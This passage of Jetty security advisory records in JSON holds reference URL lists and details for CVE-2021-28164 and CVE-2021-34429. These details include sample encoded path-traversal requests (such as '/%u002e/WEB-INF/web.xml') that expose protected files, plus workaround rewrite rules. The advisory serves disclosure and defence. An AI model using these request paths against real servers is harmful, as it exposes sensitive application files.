"https://lists.apache.org/thread.html/rbc5a622401924fadab61e07393235838918228b3d8a1a6704295b032@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5a8d7a0a13bc8152d427a7e9097cdeb139c6cfe111b2f00f26d16b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf99e4495461099cad9aa62e0164f8f25a7f97b791b4ace56e375f8d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1646894341450fdc4f7e96a88f5e2cf18d8004714f98aec6b831b3e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1d9b8e9d17749d4d2b9abaaa72c422d090315bd6bc0ae73a16abc1c@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/re08b03cd1754b32f342664eead415af48092c630c8e3e0deba862a26@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d45051310b11c6d6476f20d71b08ea97cb76846cbf61d196bac1c3f@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8cacf91ae1b17cc6531d20953c52fa52f6fd3191deb3383446086ab7@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8dd01541fc49d24ec223365a9974231cbd7378b749247a89b0a52210@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8fead0144bb84d8714695c43607dca9c5101aa028a431ec695882fe5@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90b5ac6e2bf190a5297bda58c7ec76d01cd86ff050b2470fcd9f4b35@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r911c1879258ebf98bca172c0673350eb7ea6569ca1735888d4cb7adc@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r916b6542bd5b15a8a7ff8fc14a0e0331e8e3e9d682f22768ae71d775@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r93b240be16e642579ed794325bae31b040e1af896ecc12466642e19d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r93d5e81e879120d8d87925dbdd4045cb3afa9b066f4370f60b626ce3@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b790fe3a93121199f41258474222f15002b2f729495aa7ecbf90718@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c010b79140452294292379183e7fe8e3533c5bb4db3f3fb39a6df61@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9cc76b98f87738791b8ec3736755f92444d3c8cb26bd4e4ffdb5c1cc@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9cd444f944241dc26d9b8b007fe8971ed7f005b56befef7a4f4fb827@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d9b4b93df7f92cdf1147db0fc169be1776c93d1fbc63bc65721fffd@%3Cdev.knox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f8c45a2a4540911cd8bd0485f67e8091883c9234d7a3aeb349c46c1@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1f19625cc67ac1b459c558f2ea5647d71ce51c6fe4f4cb03baec849@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra55e04d5a73afcb8383f4386e2b26832c6e3972e53827021ab885943@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra5b7313d8cc9411db6790adfba33f2cf0665cb77adb7b02043c95867@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5706141ca397587f7ee0f500a39ccc590a41f802fc125fc135cb92f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree506849c4f04376793b1a3076bc017da60b8a2ef2702dc214ff826f@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/refbbb0eb65c185d1fa491cee08ac8ed32708ce3b269133a6da264317@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf00ea6376f3d0e8b8f62cf6d4a4f28b24e27193acd2c851f618aa41e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf3bc023a7cc729aeac72f482e2eeeab9008aa6b1dadbeb3f45320cae@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfd9f102864a039f7fda64a580dfe1a342d65d7b723ca06dc9fbceb31@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe5caef1fd6cf4b8ceac1b63c33195f2908517b665c946c020d3fbd6@%3Cissues.beam.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/rfe6ba83d14545e982400dea89e68b10113cb5202a3dcb558ce64842d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff0ad6a7dac2182421e2db2407e44fbb61a89904adfd91538f21fbf8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201123-0005" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2e24756d28580eeac811c5c6a12012c9f424b6e5bffb89f98ee3d03@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc44d1147f78496ec9932a38b28795ff4fd0c4fa6e3b6f5cc33c14d29@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4b972ea10c5a65c6a88a6e233778718ab9af7f484affdd5e5de0cff@%3Ccommits.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc77918636d8744d50312e4f67ba2e01f47db3ec5144540df8745cb38@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8dd95802be0cca8d7d0929c0c8484ede384ecb966b2a9dc7197b089@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc9d2ab8a6c7835182f20b01104798e67c75db655c869733a0713a590@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rccedec4cfd5df6761255b71349e3b7c27ee0745bd33698a71b1775cf@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdcf32952397c83a1d617a8c9cd5c15c98b8d0d38a607972956bde7e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdd56ab4255801a0964dcce3285e87f2c6994e6469e189f6836f34e3@%3Cnotifications.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcfb95a7c69c4b9c082ea1918e812dfc45aa0d1e120fd47f68251a336@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcff5caebfd535195276aaabc1b631fd55a4ff6b14e2bdfe33f18ff91@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd58b60ab2e49ebf21022e59e280feb25899ff785c88f31fe314aa5b9@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7e62e2972a41c2658f41a824b8bdd15644d80fcadc51fe7b7c855de@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbf1cd0ab330c032f3a09b453cb6405dccc905ad53765323bddab957@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdddb4b06e86fd58a1beda132f22192af2f9b56aae8849cb3767ccd55@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde11c433675143d8d27551c3d9e821fe1955f1551a518033d3716553@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde782fd8e133f7e04e50c8aaa4774df524367764eb5b85bf60d96747@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r1dbb87c9255ecefadd8de514fa1d35c1d493c0527d7672cf40505d04@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1ed79516bd6d248ea9f0e704dbfd7de740d5a75b71c7be8699fec824@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1ef28b89ff0281c87ba3a7659058789bf28a99b8074191f1c3678db8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fe31643fc34b4a33ae3d416d92c271aa97663f1782767d25e1d9ff8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2122537d3f9beb0ce59f44371a951b226406719919656ed000984bd0@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r279254a1bd6434c943da52000476f307e62b6910755387aeca1ec9a1@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2aa316d008dab9ae48350b330d15dc1b863ea2a933558fbfc42b91a6@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d17b2a4803096ba427f3575599ea29b55f5cf9dbc1f12ba044cae1a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e02700f7cfecb213de50be83e066086bea90278cd753db7fdc2ccff@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f732ee49d00610683ab5ddb4692ab25136b00bfd132ca3a590218a9@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3042a9dd2973aa229e52d022df7813e4d74b67df73bfa6d97bb0caf8@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r336b1694a01858111e4625fb9ab2b07ad43a64a525cf6402e06aa6bf@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r351298dd39fc1ab63303be94b0c0d08acd72b17448e0346d7386189b@%3Cissues.beam.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r382870d6ccfd60533eb0d980688261723ed8a0704dafa691c4e9aa68@%3Ccommits.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a763de620be72b6d74f46ec4bf39c9f35f8a0b39993212c0ac778ec@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3b0ce1549a1ccdd7e51ec66daf8d54d46f1571edbda88ed09c96d7da@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=567921" }, { "type": "WEB", "url": "https://cwe.mitre.org/data/definitions/378.html" }, { "type": "WEB", "url": "https://cwe.mitre.org/data/definitions/379.html" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0259b14ae69b87821e27fed1f5333ea86018294fd31aab16b1fac84e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07525dc424ed69b3919618599e762f9ac03791490ca9d724f2241442@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r09b345099b4f88d2bed7f195a96145849243fb4e53661aa3bcf4c176@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d7ad4f02c44d5d53a9ffcbca7ff4a8138241322da9c5c35b5429630@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d95e01f52667f44835c40f6dea72bb4397f33cd70a564ea74f3836d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0df8fe10fc36028cf6d0381ab66510917d0d68bc5ef7042001d03830@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r0e9efe032cc65433251ee6470c66c334d4e7db9101e24cf91a3961f2@%3Ccommits.directory.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f5e9b93133ef3aaf31484bc3e15cc4b85f8af0fe4de2dacd9379d72@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r100c5c7586a23a19fdb54d8a32e17cd0944bdaa46277b35c397056f6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r171846414347ec5fed38241a9f8a009bd2c89d902154c6102b1fb39a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r185d10aae8161c08726f3ba9a1f1c47dfb97624ea6212fa217173204@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18b6f10d9939419bae9c225d5058c97533cb376c9d6d0a0733ddd48d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r19e8b338af511641d211ff45c43646fe1ae19dc9897d69939c09cabe@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d40368a309f9d835dcdd900249966e4fcbdf98c1cc4c84db2cd9964@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b83ca85c8f9a6794b1f85bc70d1385ed7bc1ad07750d0977537154a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dfa64ecc3d67c1a71c08bfa04064549179d499f8e20a8285c57bd51@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6f51a654ac2e67e3d1c65a8957cbbb127c3f15b64b4fcd626df03633@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70f8bcccd304bd66c1aca657dbfc2bf11f73add9032571b01f1f733d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r71da5f51ef04cb95abae560425dce9667740cbd567920f516f76efb7@%3Cissues.beam.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/r73b5a9b677b707bbb7c1469ea746312c47838b312603bada9e382bba@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r761a52f1e214efec286ee80045d0012e955eebaa72395ad62cccbcfc@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769411eb43dd9ef77665700deb7fc491fc3ceb532914260c90b56f2f@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r77dd041d8025a869156481d2268c67ad17121f64e31f9b4a1a220145@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bdc83513c12db1827b79b8d57a7a0975a25d28bc6c5efe590ec1e02@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7da5ae60d7973e8894cfe92f49ecb5b47417eefab4c77cc87514d3cf@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8045eedd6bb74efcd8e01130796adbab98ee4a0d1273509fb1f2077a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819857361f5a156e90d6d06ccf6c41026bc99030d60d0804be3a9957@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r827d17bf6900eddc686f4b6ee16fc5e52ca0070f8df7612222c40ac5@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r874688141495df766e62be095f1dfb0bf4a24ca0340d8e0215c03fab@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r87b0c69fef09277333a7e1716926d1f237d462e143a335854ddd922f@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r87d8337300a635d66f0bb838bf635cdfcbba6b92c608a7813adbf4f4@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8866f0cd2a3b319288b7eea20ac137b9f260c813d10ee2db88b65d32@%3Cissues.beam.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r3e05ab0922876e74fea975d70af82b98580f4c14ba643c4f8a9e3a94@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f32cb4965239399c22497a0aabb015b28b2372d4897185a6ef0ccd7@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r407c316f6113dfc76f7bb3cb1693f08274c521064a92e5214197548e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4179c71908778cc0598ee8ee1eaed9b88fc5483c65373f45e087f650@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r44115ebfbf3b7d294d7a75f2d30bcc822dab186ebbcc2dce11915ca9@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4946ffd86ad6eb7cb7863311235c914cb41232380de8d9dcdb3c115c@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f29fb24639ebc5d15fc477656ebc2b3aa00fcfbe197000009c26b40@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r503045a75f4419d083cb63ac89e765d6fb8b10c7dacc0c54fce07cff@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r547bb14c88c5da2588d853ed3030be0109efa537dd797877dff14afd@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5494fdaf4a0a42a15c49841ba7ae577d466d09239ee1050458da0f29@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r556787f1ab14da034d79dfff0c123c05877bbe89ef163fd359b4564c@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r568d354961fa88f206dc345411fb11d245c6dc1a8da3e80187fc6706@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r58f5b14dc5ae43583db3a7e872419aca97ebe47bcd7f7334f4128016@%3Cissues.beam.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r59e0878013d329dcc481eeafebdb0ee445b1e2852d0c4827b1ddaff2@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5a07f274f355c914054c7357ad6d3456ffaca064f26cd780acb90a9a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5a9462096c71593e771602beb0e69357adb5175d9a5c18d5181e0ab4@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6236ae4adc401e3b2f2575c22865f2f6c6ea9ff1d7b264b40d9602af@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66e99d973fd79ddbcb3fbdb24f4767fe9b911f5b0abb05d7b6f65801@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-378", "CWE-379", "CWE-552" ], "github_reviewed": true, "github_reviewed_at": "2020-11-04T17:48:31Z", "nvd_published_at": "2020-10-23T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v7ff-8wcx-gmc5", "published": "2021-04-06T17:31:01Z", "modified": "2024-03-15T05:19:57.447892Z", "aliases": [ "CVE-2021-28164" ], "related": [ "CVE-2021-28164" ], "summary": "Authorization Before Parsing and Canonicalization in jetty", "details": "Release 9.4.37 introduced a more precise implementation of [RFC3986](https://tools.ietf.org/html/rfc3986#section-3.3) with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations. 
The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the `WEB-INF` directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the `web.xml` file. This can reveal sensitive information regarding the implementation of a web application. Workarounds found by HttpCompliance mode RFC7230_NO_AMBIGUOUS_URIS can be enabled by updating `start.d/http.ini` to include: jetty.http.compliance=RFC7230_NO_AMBIGUOUS_URIS.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.37" }, { "fixed": "9.4.39" } ] } ], "versions": [ "9.4.37.v20210219", "9.4.38.v20210224" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-v7ff-8wcx-gmc5/GHSA-v7ff-8wcx-gmc5.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28164" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210611-0006" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E" 
}, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-551", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2021-04-02T20:28:10Z", "nvd_published_at": "2021-04-01T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vjv5-gp2w-65vm", "published": "2021-07-19T15:15:24Z", "modified": "2024-03-08T05:16:35.196736Z", "aliases": [ "CVE-2021-34429" ], "related": [ "CVE-2021-34429" ], "summary": "Encoded URIs can access WEB-INF directory in Eclipse Jetty", "details": "### Description\nURIs can be crafted using some encoded characters to access the content of the `WEB-INF` directory and/or bypass some security constraints.\nThis is a variation of the vulnerability reported in [CVE-2021-28164](https://nvd.nist.gov/vuln/detail/CVE-2021-28164)/[GHSA-v7ff-8wcx-gmc5](https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5).\n\n### Impact\nThe default compliance mode allows requests with URIs that contain a %u002e segment to access protected resources within the WEB-INF directory. 
For example, a request to `/%u002e/WEB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. Similarly, an encoded null character can prevent correct normalization so that /.%00/WEB-INF/web.xml can also retrieve the web.xml file.\n\n### Workarounds\nSome Jetty [rewrite rules](https://www.eclipse.org/jetty/documentation/jetty-9/index.html#rewrite-handler) can be deployed to rewrite any request containing encoded dot segments or null characters in the raw request URI, to a known not found resource:\n```xml\n\u003cCall name=\"addRule\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.rewrite.handler.RewriteRegexRule\"\u003e\n \u003cSet name=\"regex\"\u003e.*/(?:\\.+/)+.*\u003c/Set\u003e\n \u003cSet name=\"replacement\"\u003e/WEB-INF/Not-Found\u003c/Set\u003e\n \u003c/New\u003e\n \u003c/Arg\u003e\n\u003c/Call\u003e\n\u003cCall name=\"addRule\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.rewrite.handler.ValidUrlRule\"/\u003e\n \u003c/Arg\u003e\n\u003c/Call\u003e\n```\n\n### Analysis\nPrior to 9.4.37, Jetty was protected from this style of attack by two lines of defense:\n + URIs were decoded first and then normalized for `.` and `..` sequences. Whilst this is not according to the RFC, it did 